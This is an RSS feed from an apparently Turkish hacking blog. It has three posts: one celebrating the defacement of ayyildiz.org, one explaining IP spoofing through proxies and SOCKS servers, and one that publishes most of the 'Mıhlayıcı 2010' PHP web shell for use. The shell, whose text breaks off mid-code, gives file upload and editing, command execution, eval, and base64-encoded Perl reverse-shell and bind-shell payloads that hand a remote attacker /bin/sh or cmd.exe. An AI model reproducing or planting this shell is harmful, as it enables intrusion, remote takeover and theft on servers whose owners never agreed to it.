<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>GLOBAL HACKER eL-CeWaD Priv Blog / root@cw</title>
	<atom:link href="http://elc3wad.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://elc3wad.wordpress.com</link>
	<description>Msn Hack &#124; Hacker &#124; Hackinq &#124; Web Hack &#124; Virüs &#124; Keyloger &#124; Trojan &#124; Rat &#124; Hack Sitesi &#124; Hack Haber &#124; Hack Programları &#124; Hacked &#124; Hack Forum</description>
	<lastBuildDate>Mon, 20 Feb 2012 05:49:42 +0000</lastBuildDate>
	<language>tr</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='elc3wad.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://1.gravatar.com/blavatar/5aae6994d023c492bbac32df1d85d40a?s=96&#038;d=http%3A%2F%2Fs2.wp.com%2Fi%2Fbuttonw-com.png</url>
		<title>GLOBAL HACKER eL-CeWaD Priv Blog / root@cw</title>
		<link>http://elc3wad.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://elc3wad.wordpress.com/osd.xml" title="GLOBAL HACKER eL-CeWaD Priv Blog / root@cw" />
	<atom:link rel='hub' href='http://elc3wad.wordpress.com/?pushpress=hub'/>
		<item>
		<title>Ayyildiz.org Hacklendi</title>
		<link>http://elc3wad.wordpress.com/2012/01/30/ayyildiz-org-hacklendi/</link>
		<comments>http://elc3wad.wordpress.com/2012/01/30/ayyildiz-org-hacklendi/#comments</comments>
		<pubDate>Mon, 30 Jan 2012 07:30:37 +0000</pubDate>
		<dc:creator>eL-CeWaD</dc:creator>
				<category><![CDATA[Genel]]></category>
		<category><![CDATA[ayyildiz.org hacklendi]]></category>
		<category><![CDATA[hacker]]></category>
		<category><![CDATA[lamer]]></category>
		<category><![CDATA[turkguvenligi]]></category>

		<guid isPermaLink="false">http://elc3wad.wordpress.com/?p=221</guid>
		<description><![CDATA[Merhaba dostlar helikopter , araba , uçak , teyyare , füze , uydu vs vs şeyler düşüren Sözde Hekır Grubu ayyildiz.org Feyklendi   Geçmiş olsun AYT olur boyle şeyler üzmeyin kendinizi 2011 Yılında olay yaratan ve Dünya sıralamasında 5. sırada bulunan ve Dünya&#8217;nın Anonymous den sonra en iyi hacker grubu seçilenTurkguvenligi adlı hacker grubu tarafından yapıldığı görülen saldırı [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elc3wad.wordpress.com&amp;blog=30896651&amp;post=221&amp;subd=elc3wad&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><span style="color:#ff0000;">Merhaba dostlar helikopter , araba , uçak , teyyare , füze , uydu vs vs şeyler düşüren Sözde Hekır Grubu ayyildiz.org Feyklendi <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />  <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />  </span></p>
<p><span style="color:#ff0000;">Geçmiş olsun AYT olur boyle şeyler üzmeyin kendinizi <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </span></p>
<p>2011 Yılında olay yaratan ve <a href="http://www.cyberhaber.com/haber/5093-2011-yilina-damga-vuran-hack-haber-olaylari.html" target="_blank">Dünya sıralamasında 5. sırada bulunan</a> ve Dünya&#8217;nın Anonymous den sonra en iyi hacker grubu seçilenTurkguvenligi adlı hacker grubu tarafından yapıldığı görülen saldırı sonrasında Türkiye&#8217;nin önde gelen hack platformu sitesi ve Türk basında büyük yankılar uyandıran internet sitesi Ayyildiz.org hacklendi.<br />
Dünya basınında büyük yankılar uyandıran ve 2011 yılında yapmış olduğu büyük saldırılar ile Dünya basınında büyük yankı bulan, Türk basınıda ise fazla yankı bulmayan büyük olaylara imza atan Turkguvenligi adlı hacker grubu Ayyildiz.org hackledi.</p>
<p>Saldırı sonrasında hacklenen intenret sitesine ise ilgin sözlerin yer aldığı index bırakıldı,</p>
<div>&#8221; eskiden botnet çektiğiniz siteyi hekledik diye haber yaptırıyodunuz.<br />
şimdi botnet bile çekmeden haber yaptırıyosunuz. ne zaman hek öğrenmeyi düşünüyosunuz?<br />
en çok şu pentagon bize saldırmak için kapanıyo lafına yarıldık. o kullandığın maddeden bize de versene</p>
<p>bizim haberler, satılık türk medyasında değil dünya basınında çıkar, ordan takip edersiniz. öptük panpişler.</p>
<p>&#8220;Turkguvenligi: Biz varken hekin tadı yok&#8221;</p>
<p>bs&#8217;ye selam heke devam<br />
<img src="http://elc3wad.files.wordpress.com/2012/01/fdd7a261.png?w=300" alt="" /><br />
hek öğrenmek isterseniz uğrayın bi ara</div>
<div></div>
<div>
<span style="color:#0000ff;"><a href="http://ayyildiz.org/" target="_blank"><span style="color:#0000ff;">http://ayyildiz.org<br />
</span></a></span></p>
<p><span style="color:#0000ff;"><a href="http://www.zone-h.org/mirror/id/16804691" target="_blank"><span style="color:#0000ff;">http://www.zone-h.org/mirror/id/16804691</span></a></span></div>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/elc3wad.wordpress.com/221/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/elc3wad.wordpress.com/221/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/elc3wad.wordpress.com/221/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/elc3wad.wordpress.com/221/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/elc3wad.wordpress.com/221/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/elc3wad.wordpress.com/221/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/elc3wad.wordpress.com/221/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/elc3wad.wordpress.com/221/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/elc3wad.wordpress.com/221/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/elc3wad.wordpress.com/221/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/elc3wad.wordpress.com/221/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/elc3wad.wordpress.com/221/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/elc3wad.wordpress.com/221/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/elc3wad.wordpress.com/221/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elc3wad.wordpress.com&amp;blog=30896651&amp;post=221&amp;subd=elc3wad&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://elc3wad.wordpress.com/2012/01/30/ayyildiz-org-hacklendi/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/44a3f6ca78997305202cb81731b61e9c?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">rootcw</media:title>
		</media:content>

		<media:content url="http://elc3wad.files.wordpress.com/2012/01/fdd7a261.png?w=300" medium="image" />
	</item>
		<item>
		<title>İp spoofing nedir nasıl kullanılır?</title>
		<link>http://elc3wad.wordpress.com/2012/01/19/ip-spoofing-nedir-nasil-kullanilir/</link>
		<comments>http://elc3wad.wordpress.com/2012/01/19/ip-spoofing-nedir-nasil-kullanilir/#comments</comments>
		<pubDate>Thu, 19 Jan 2012 18:58:44 +0000</pubDate>
		<dc:creator>eL-CeWaD</dc:creator>
				<category><![CDATA[Genel]]></category>
		<category><![CDATA[İp spoofing]]></category>

		<guid isPermaLink="false">http://elc3wad.wordpress.com/?p=212</guid>
		<description><![CDATA[İnternet veya ağa bağlı sisteminizle başka birsisteme bağlanacaksınız, ama bu bağlantın sizin tarafınızdan yapıldığını gizlemek istiyorsunuz. Bunun için bağlantı sırasında kimliğinizi (ki TCP/IP protokollerinde kimliğiniz IP adresinizdir), yanlış gösteriyorsunuz. İşte bu yaptığını işleme IP Spoofing denir ( Hani bunun teknik makale üslubu? ). Yani yaptığınız bağlantıda IP adresinizi karşıdaki bilgisayara farklı gösterme işlemine IP Spoofing denir. IP SPOOFING YÖNTEMLERİ: IP Spoofing iki şekilde yapılır. Proxy/Socks [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elc3wad.wordpress.com&amp;blog=30896651&amp;post=212&amp;subd=elc3wad&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://elc3wad.files.wordpress.com/2012/01/ipspoof.jpg"><img class="aligncenter size-medium wp-image-216" title="ipspoof" src="http://elc3wad.files.wordpress.com/2012/01/ipspoof.jpg?w=300&#038;h=193" alt="" width="300" height="193" /></a><br />
İnternet veya ağa bağlı sisteminizle başka birsisteme bağlanacaksınız, ama bu bağlantın sizin tarafınızdan yapıldığını gizlemek istiyorsunuz. Bunun için bağlantı sırasında kimliğinizi (ki TCP/IP protokollerinde kimliğiniz IP adresinizdir), yanlış gösteriyorsunuz. İşte bu yaptığını işleme IP Spoofing denir ( Hani bunun teknik makale üslubu? ). Yani yaptığınız bağlantıda IP adresinizi karşıdaki bilgisayara farklı gösterme işlemine IP Spoofing denir.</p>
<p><span style="color:#ff0000;">IP SPOOFING YÖNTEMLERİ:</span></p>
<p>IP Spoofing iki şekilde yapılır. Proxy/Socks sunucularını kullanarak, veya IP paketlerini editleyerek. Proxy/Socks sunucusu kullanmak basit bir yöntemdir. Daha çok web/IRC bağlantılarında IPyi gizlemek için kullanılır. IP paketlerini editleyerek yapılan IP Spoofing çok etkilidir ve genel olarak D.o.S saldırılarında veya session-hijacking yönteminde kullanılır.</p>
<p><span style="color:#ff0000;">PROXY/SOCKS KULLANIMI:</span></p>
<p>Internetde gezdiğiniz sitelerin sizin IP adresinizi loglarında tutmaması için, kullandığınız browserın bağlantı ayarlarına girerek bir proxy sunucusu üzerinden bağlantı yapmasını sağlayabilirsiniz. Buşekilde siz aslında proxy sunucusuna bağlanmış olurken, proxy sunucusu sizin yerinize hedefbilgisayara bağlanmış olacaktır.</p>
<p><span style="color:#ff0000;">Örnek:</span></p>
<p><span style="color:#0000ff;">MySystem:1059 -&gt; MyProxy:8080</span></p>
<p><span style="color:#0000ff;">MyProxy:1039 -&gt; MyTarget:80</span></p>
<p>Önce sistemimiz (MySystem) kullanmak istediğimiz proxy`ye (MyProxy), proxynin portundan bağlanıyor. Proxy portları 80, 3128, 8080 gibi değişik portlar olabilir. Bu bağlantı sağlanınca,sistemimiz daha üst bir protokol ile (HTTP, HTTPS), bağlanmak istediği hedef (MyTarget)bilgisayarla ilgili bilgiyi proxy`ye yolluyor. Proxy`de hedef bilgisayara bağlanıp bizim gönderdiklerimizi ona, ondan gelen bilgileri, bizim sistemimize aktarıyor. Böylece hedefbilgisayarın bağlantı loglarına bizim değil Proxy`nin IPsi geçmiş oluyor. Yalnız bazı proxy yazılımları bu konuda tam olarak IP saklama özelliğine sahip değil. Bizim isteğimizi karşı tarafa yollarken, bizim IPmizide HTTP başlığına ekleyenler var. Logların incelenmesi durumunda bağlantının gerçekten kim adına istenmiş olduğu ortaya çıkıyor. Proxy kullanımının da IP adresinizin gizlenmesiyle ilgili bir de şu tehlike var. Sizin IP adresiniz, hedef bilgisayara iletilmese de proxy loglarında tutuluyor. Bu yüzden hedef bilgisayarın admini, proxy sunucusunun loglarına başvurup sizin IPnizi bulabilir.</p>
<p>Eğer IP adresimizi webde surf yaparken değil de, başka bir TCP bağlantısında spoof etmek istiyorsak socks sunucusu kullanabiliriz. Socks sunucuları genelde 1080. porttan bağlantı kabul ederler ve kullanıcıya Proxy sunucusundan çok daha fazla seçenek sunar. Socks sunucusu kullanarak telnet, ftp, IRC gibi TCP bağlantısı kabul eden her sunucuya bağlanabilirsiniz. Socks sunucusu ile sistemimiz haberleşmek için TCP bağlantısını yaptıktan sonra socks protokolünü kullanır.</p>
<p><span style="color:#ff0000;">Örnek:</span></p>
<p><span style="color:#0000ff;">MySystem:1075 -&gt; MySocks:1080</span></p>
<p><span style="color:#0000ff;">MySocks:1043 -&gt; MyTarget:ftp</span></p>
<p>Proxy bağlantısında olduğu gibi yine sistemimiz önce socks sunucusuna bağlanır.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/elc3wad.wordpress.com/212/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/elc3wad.wordpress.com/212/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/elc3wad.wordpress.com/212/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/elc3wad.wordpress.com/212/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/elc3wad.wordpress.com/212/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/elc3wad.wordpress.com/212/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/elc3wad.wordpress.com/212/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/elc3wad.wordpress.com/212/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/elc3wad.wordpress.com/212/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/elc3wad.wordpress.com/212/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/elc3wad.wordpress.com/212/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/elc3wad.wordpress.com/212/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/elc3wad.wordpress.com/212/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/elc3wad.wordpress.com/212/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elc3wad.wordpress.com&amp;blog=30896651&amp;post=212&amp;subd=elc3wad&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://elc3wad.wordpress.com/2012/01/19/ip-spoofing-nedir-nasil-kullanilir/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/44a3f6ca78997305202cb81731b61e9c?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">rootcw</media:title>
		</media:content>

		<media:content url="http://elc3wad.files.wordpress.com/2012/01/ipspoof.jpg?w=300" medium="image">
			<media:title type="html">ipspoof</media:title>
		</media:content>
	</item>
		<item>
		<title>Mıhlayıcı 2010 shell</title>
		<link>http://elc3wad.wordpress.com/2012/01/17/mihlayici-2010-shell/</link>
		<comments>http://elc3wad.wordpress.com/2012/01/17/mihlayici-2010-shell/#comments</comments>
		<pubDate>Tue, 17 Jan 2012 08:13:26 +0000</pubDate>
		<dc:creator>eL-CeWaD</dc:creator>
				<category><![CDATA[Shell Bankası]]></category>
		<category><![CDATA[Mıhlayıcı 2010 shell]]></category>

		<guid isPermaLink="false">http://elc3wad.wordpress.com/?p=208</guid>
		<description><![CDATA[&#60;?php session_start(); if(strtolower(substr(PHP_OS, 0, 3)) == "win"){ $slash="\\"; }else{ $slash="/"; } if ($_REQUEST['address']){ if(is_readable($_REQUEST['address'])){ chdir($_REQUEST['address']);}} $me=$_SERVER['PHP_SELF']; $formp="&#60;form method=post action='".$me."'&#62;"; $formg="&#60;form method=get action='".$me."'&#62;"; $nowaddress='&#60;input type=hidden name=address value="'.getcwd().'"&#62;'; if (isset($_FILES["filee"]) and ! $_FILES["filee"]["error"]) { move_uploaded_file($_FILES["filee"]["tmp_name"], $_FILES["filee"]["name"]); $ifupload="Uploaded "; } if ($_REQUEST['chmode'] &#38;&#38; $_REQUEST['chmodenum']){ chmod($_POST['chmode'],"0".$_POST['chmodenum']); } $head='&#60;head&#62; &#60;meta http-equiv="Content-Type" content="text/html; charset=UTF-8"&#62; &#60;title&#62;Moon&#60;/title&#62; &#60;/head&#62;&#60;body topmargin="0" leftmargin="0" rightmargin="0" bgcolor="#f2f2f2"&#62;&#60;div align="center"&#62; [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elc3wad.wordpress.com&amp;blog=30896651&amp;post=208&amp;subd=elc3wad&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><span id="more-208"></span></p>
<pre>&lt;?php
session_start();
if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
$slash="\\";
}else{
$slash="/";
}
if ($_REQUEST['address']){
if(is_readable($_REQUEST['address'])){
chdir($_REQUEST['address']);}}

$me=$_SERVER['PHP_SELF'];
$formp="&lt;form method=post action='".$me."'&gt;";
$formg="&lt;form method=get action='".$me."'&gt;";
$nowaddress='&lt;input type=hidden name=address value="'.getcwd().'"&gt;';
if (isset($_FILES["filee"]) and ! $_FILES["filee"]["error"]) {
   move_uploaded_file($_FILES["filee"]["tmp_name"], $_FILES["filee"]["name"]);
   $ifupload="Uploaded <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> ";
}
if ($_REQUEST['chmode'] &amp;&amp; $_REQUEST['chmodenum']){
chmod($_POST['chmode'],"0".$_POST['chmodenum']);
}
$head='&lt;head&gt;
&lt;meta http-equiv="Content-Type" content="text/html; charset=UTF-8"&gt;
&lt;title&gt;Moon&lt;/title&gt;
&lt;/head&gt;&lt;body  topmargin="0" leftmargin="0" rightmargin="0"
bgcolor="#f2f2f2"&gt;&lt;div align="center"&gt;
&amp;nbsp;&lt;table border="1" width="1000" height="14" bordercolor="#CDCDCD" style="border-collapse: collapse; border-style: solid; border-width: 1px"&gt;
&lt;tr&gt;
&lt;td height="14" width="996"&gt;
&lt;p align="center"&gt;&lt;font face="Tahoma" style="font-size: 9pt"&gt;&lt;span lang="en-us"&gt;&lt;a href="?do=filemanger"&gt;File
Manger&lt;/a&gt; -- &lt;a href="?do=cmd"&gt;Command Execute&lt;/a&gt; -- &lt;a href="?do=bc"&gt;Back Connect&lt;/a&gt; --
&lt;a href="?do=bypasscmd"&gt;BypasS Command eXecute(SF-DF)&lt;/a&gt; --
&lt;a href="?do=bypassdir"&gt;BypasS Directory&lt;/a&gt; -- &lt;a href="?do=eval&amp;address='.getcwd().'"&gt;
Eval&lt;/a&gt; -- &lt;a href="?do=db"&gt;Data Base&lt;/a&gt; -- &lt;a href="?do=info"&gt;
Server Information&lt;/a&gt;&lt;/span&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;
&lt;div align="center"&gt;
&lt;table id="table2" style="border-collapse: collapse; border-style:
solid;" width="1000" bgcolor="#eaeaea" border="1" bordercolor="#c6c6c6"
cellpadding="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;div align="center"&gt;&lt;table id="table3" style="border-style:dashed; border-width:1px; margin-top: 20px; margin-bottom: 20px;
border-collapse: collapse" width="950" border="1" bordercolor="#cdcdcd"
 height="620" bordercolorlight="#CDCDCD" bordercolordark="#CDCDCD"&gt;&lt;tbody&gt;&lt;tr&gt;
&lt;td style="border: 1px solid rgb(198, 198, 198);"
width="950" bgcolor="#e7e3de" height="590" valign="top"&gt;';
$end='&lt;p align="center"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#c6c6c6"&gt;&lt;p style="margin-top: 0pt; margin-bottom: 0pt" align="center"&gt;&lt;span lang="en-us"&gt;&lt;font face="Tahoma" style="font-size: 9pt"&gt;Coded by Amin Shokohi (Pejvak)&lt;br&gt;&lt;a href="http://www.itsecteam.com" target="_blank&gt;&lt;font size=1&gt;iTSecTeam.com&lt;/a&gt;&lt;/font&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;/body&gt;&lt;/html&gt;';
$deny=$head."&lt;p align='center'&gt; &lt;b&gt;Oh My God!&lt;br&gt; Permission Denied".$end;
if ($_GET['do']=="edit" &amp;&amp; $_GET['filename']!="dir"){
if(is_readable($_GET['address'].$_GET['filename'])){
$opedit=fopen($_GET['address'].$_GET['filename'],"r");
while(!feof($opedit))
$data.=fread($opedit,9999);
fclose($opedit);
echo $head.$formp.$nowaddress.'&lt;p align="center"&gt;File Name : '.$_GET['address'].$_GET['filename'].'&lt;br&gt;&lt;textarea rows="19" name="fedit" cols="87"&gt;'.htmlspecialchars("$data", ENT_QUOTES).'&lt;/textarea&gt;&lt;br&gt;&lt;input value="'.$_GET['filename'].'" name=namefe&gt;&lt;br&gt;&lt;input type=submit value="  Save  "&gt;&lt;/form&gt;&lt;/p&gt;'.$end;exit;
}else{echo $deny;exit;}}
function sizee($size)
{
 if($size &gt;= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
 elseif($size &gt;= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
 elseif($size &gt;= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
 else {$size = $size . " B";}
 return $size;
}
function deleteDirectory($dir) {
if (!file_exists($dir)) return true;
if (!is_dir($dir) || is_link($dir)) return unlink($dir);
foreach (scandir($dir) as $item) {
if ($item == '.' || $item == '..') continue;
if (!deleteDirectory($dir . "/" . $item)) {
chmod($dir . "/" . $item, 0777);
if (!deleteDirectory($dir . "/" . $item)) return false;
};}return rmdir($dir);}
if($_GET['do']=="rename"){
echo $head.$formp.$nowaddress.'&lt;p align="center"&gt;&lt;input value='.$_GET['filename'].'&gt;&lt;input type=hidden name=addressren value='.$_GET['address'].$_GET['filename'].'&gt; To &lt;input name=nameren&gt;&lt;br&gt;&lt;input type=submit value="  Save  "&gt;&lt;/form&gt;&lt;/p&gt;'.$end;exit;
}
if ($_REQUEST['cdirname']){
if(is_writable($_REQUEST['address'])){
mkdir($_REQUEST['address'].$slash.$_REQUEST['cdirname'],"0777");}else{echo $deny;exit;}}
function bcn($ipbc,$pbc){
$bcperl="IyEvdXNyL2Jpbi9wZXJsCiMgQ29ubmVjdEJhY2tTaGVsbCBpbiBQZXJsLiBTaGFkb3cxMjAgLSB3
NGNrMW5nLmNvbQoKdXNlIFNvY2tldDsKCiRob3N0ID0gJEFSR1ZbMF07CiRwb3J0ID0gJEFSR1Zb
MV07CgogICAgaWYgKCEkQVJHVlswXSkgewogIHByaW50ZiAiWyFdIFVzYWdlOiBwZXJsIHNjcmlw
dC5wbCA8SG9zdD4gPFBvcnQ+XG4iOwogIGV4aXQoMSk7Cn0KcHJpbnQgIlsrXSBDb25uZWN0aW5n
IHRvICRob3N0XG4iOwokcHJvdCA9IGdldHByb3RvYnluYW1lKCd0Y3AnKTsgIyBZb3UgY2FuIGNo
YW5nZSB0aGlzIGlmIG5lZWRzIGJlCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIFNPQ0tfU1RSRUFN
LCAkcHJvdCkgfHwgZGllICgiWy1dIFVuYWJsZSB0byBDb25uZWN0ICEiKTsKaWYgKCFjb25uZWN0
KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsIGluZXRfYXRvbigkaG9zdCkpKSB7ZGll
KCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpO30KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOwog
IG9wZW4oU1RET1VULCI+JlNFUlZFUiIpOwogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOwogIGV4
ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow==";
$opbc=fopen("bcc.pl","w");
fwrite($opbc,base64_decode($bcperl));
fclose($opbc);
system("perl bcc.pl $ipbc $pbc") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode");
}
function wbp($wb){
$wbp="dXNlIFNvY2tldDsKJHBvcnQJPSAkQVJHVlswXTsKJHByb3RvCT0gZ2V0cHJvdG9ieW5hbWUoJ3Rj
cCcpOwpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKTsKc2V0c29j
a29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JFVVNFQUREUiwgcGFjaygibCIsIDEpKTsKYmlu
ZChTRVJWRVIsIHNvY2thZGRyX2luKCRwb3J0LCBJTkFERFJfQU5ZKSk7Cmxpc3RlbihTRVJWRVIs
IFNPTUFYQ09OTik7CmZvcig7ICRwYWRkciA9IGFjY2VwdChDTElFTlQsIFNFUlZFUik7IGNsb3Nl
IENMSUVOVCkKewpvcGVuKFNURElOLCAiPiZDTElFTlQiKTsKb3BlbihTVERPVVQsICI+JkNMSUVO
VCIpOwpvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7CnN5c3RlbSgnY21kLmV4ZScpOwpjbG9zZShT
VERJTik7CmNsb3NlKFNURE9VVCk7CmNsb3NlKFNUREVSUik7Cn0g";
$opwb=fopen("wbp.pl","w");
fwrite($opwb,base64_decode($wbp));
fclose($opwb);
echo getcwd();
system("perl wbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode");
}
function lbp($wb){
$lbp="IyEvdXNyL2Jpbi9wZXJsCnVzZSBTb2NrZXQ7JHBvcnQ9JEFSR1ZbMF07JHByb3RvPWdldHByb3Rv
YnluYW1lKCd0Y3AnKTskY21kPSJscGQiOyQwPSRjbWQ7c29ja2V0KFNFUlZFUiwgUEZfSU5FVCwg
U09DS19TVFJFQU0sICRwcm90byk7c2V0c29ja29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JF
VVNFQUREUiwgcGFjaygibCIsIDEpKTtiaW5kKFNFUlZFUiwgc29ja2FkZHJfaW4oJHBvcnQsIElO
QUREUl9BTlkpKTtsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pO2Zvcig7ICRwYWRkciA9IGFjY2Vw
dChDTElFTlQsIFNFUlZFUik7IGNsb3NlIENMSUVOVCl7b3BlbihTVERJTiwgIj4mQ0xJRU5UIik7
b3BlbihTVERPVVQsICI+JkNMSUVOVCIpO29wZW4oU1RERVJSLCAiPiZDTElFTlQiKTtzeXN0ZW0o
Jy9iaW4vc2gnKTtjbG9zZShTVERJTik7Y2xvc2UoU1RET1VUKTtjbG9zZShTVERFUlIpO30g";
$oplb=fopen("lbp.pl","w");
fwrite($oplb,base64_decode($lbp));
fclose($oplb);
system("perl lbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode");
}

if($_REQUEST['portbw']){
wbp($_REQUEST['portbw']);

}if($_REQUEST['portbl']){
lbp($_REQUEST['portbl']);
}
if($_REQUEST['ipcb'] &amp;&amp; $_REQUEST['portbc']){
bcn($_REQUEST['ipcb'],$_REQUEST['portbc']);

}

if($_REQUEST['do']=="bc"){
echo $head.$formp."&lt;p align='center'&gt;Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )&lt;br&gt;&lt;hr&gt;&lt;p align='center'&gt;&lt;&lt;&lt;&lt;&lt;&lt; Back Connect &gt;&gt;&gt;&gt;&gt;&gt;&lt;br&gt;Ip Address : &lt;input name=ipcb value=".$_SERVER['REMOTE_ADDR'] ."&gt; Port : &lt;input name=portbc value=5555&gt;&lt;br&gt;&lt;input type=submit value=Connect&gt;&lt;/form&gt;".$formp."&lt;p align='center'&gt;Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )&lt;br&gt;&lt;hr&gt;&lt;p align='center'&gt;&lt;&lt;&lt;&lt;&lt;&lt; Windows Bind Port &gt;&gt;&gt;&gt;&gt;&gt;&lt;br&gt;Port : &lt;input name=portbw value=5555&gt;&lt;br&gt;&lt;input type=submit value=Connect&gt;&lt;/form&gt;".$formp."&lt;p align='center'&gt;Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )&lt;br&gt;&lt;hr&gt;&lt;p align='center'&gt;&lt;&lt;&lt;&lt;&lt;&lt; Linux Bind Port &gt;&gt;&gt;&gt;&gt;&gt;&lt;br&gt;Port : &lt;input name=portbl value=5555&gt;&lt;br&gt;&lt;input type=submit value=Connect&gt;&lt;/form&gt;".$end;exit;

}

if ($_REQUEST['copyname'] &amp;&amp; $_REQUEST['cpyto']){
if(is_writable($_REQUEST['cpyto'])){

copy($_REQUEST['address'].$slash.$_REQUEST['copyname'],$_REQUEST['cpyto']);
}else{echo $deny;exit;}}
if($_REQUEST['cfilename']){

echo $head.$formp.$nowaddress.'&lt;p align="center"&gt;&lt;b&gt;Create File&lt;/b&gt;&lt;br&gt;&lt;textarea rows="19" name="nf4cs" cols="87"&gt;&lt;/textarea&gt;&lt;br&gt;&lt;input value="'.$_REQUEST['cfilename'].'" name=nf4c&gt;&lt;br&gt;&lt;input type=submit value="  Create  "&gt;&lt;/form&gt;'.$end;exit;
}

if($_REQUEST['nf4c'] &amp;&amp; $_REQUEST['nf4cs']){
if(is_writable($_REQUEST['address'])){

